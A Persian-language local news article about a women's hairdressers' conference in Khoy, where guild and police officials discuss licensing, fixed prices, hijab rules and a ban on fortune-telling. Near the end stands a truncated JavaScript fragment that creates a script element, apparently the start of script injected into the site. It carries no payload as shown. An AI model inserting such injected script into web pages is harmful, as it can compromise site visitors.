دوشنبه , ۳۰ بهمن ۱۳۹۶
خانه » اخبار اتاق اصناف » همایش آرایشگران زنانه شهرستان خوی
همایش آرایشگران زنانه شهرستان خوی

همایش آرایشگران زنانه شهرستان خوی

به همت اتاق اصناف و اتحادیه آریشگران بانوان و نیروی انتظامی شهرستان خوی همایش آرشگران در سالن کوثر نیروی انتظامی با شرکت اعضای اتحادیه در شهرستان خوی برگزار شد.

در این همایش بعد تلاوت آیاتی از کلام ا… مجید، محسن منصف رئیس اتاق اصناف شهرستان خوی ضمن خیر مقدم گویی و تقدیر از برگزار کنندگان همایش گفت: آرایشگاه مکانی است قابل احترام که باید تلاش آرایشگران در صدد کسب درست وبدون شائبه و مسائل اضافی باشد.وی افزود از شرایط کار در آریشگاهها علاوه بر داشتن تقریبا هفت مهارت یا حداقل سه مهارت اصلی، مکان مناسب، رعایت نکات بهداشتی و حفظ حجاب و شئونات اسلامی برای گرفتن پروانه کسب آرایشگری بسیار اهمیت دارد. منصف گفت: اینکه هر آرایشگاهی نرخ خاص خود را دارد و از مشتری دریافت می کند خلاف قانون اتحادیه بوده و جهت رفاه و آسایش مردم نرخنامه ای از سوی اتحادیه محترم ترتیب یافته که پس از بررسی های کارشناسی شده در کمیته نرخگذاری اتاق اصناف مورد تایید قرار گرفته و کلیه واحدهای صنفی ملزم به رعایت قیمتهای مصوب شده می باشند.

در ادامه همایش سرهنگ علیدوست فرمانده انتظامی شهرستان خوی ضمن عرض تسلیت ایام سوگواری سرور و سالار شهیدان حضرت امام حسین(ع) مطالبی را در خصوص رعایت حفظ حجاب و عفاف بیان نمودند ایشان در ادامه گفتند که نباید در آرایشگاهها کارهای اضافی از قبیل رمال گری و فال قهوه صورت بگیرد و تاکید کردند که اگر مشاهده شود موجب برخورد قانونی خواهدشد. علیدوست تاکید کردند که بروشور و منشور خدماتی از سوی اتحادیه چاپ گردد و در معرض دید عموم مردم قرار گیرد.

var d=document;var s=d.createElement(‘script’);

جوابی بنویسید

ایمیل شما نشر نخواهد شدخانه های ضروری نشانه گذاری شده است. *

*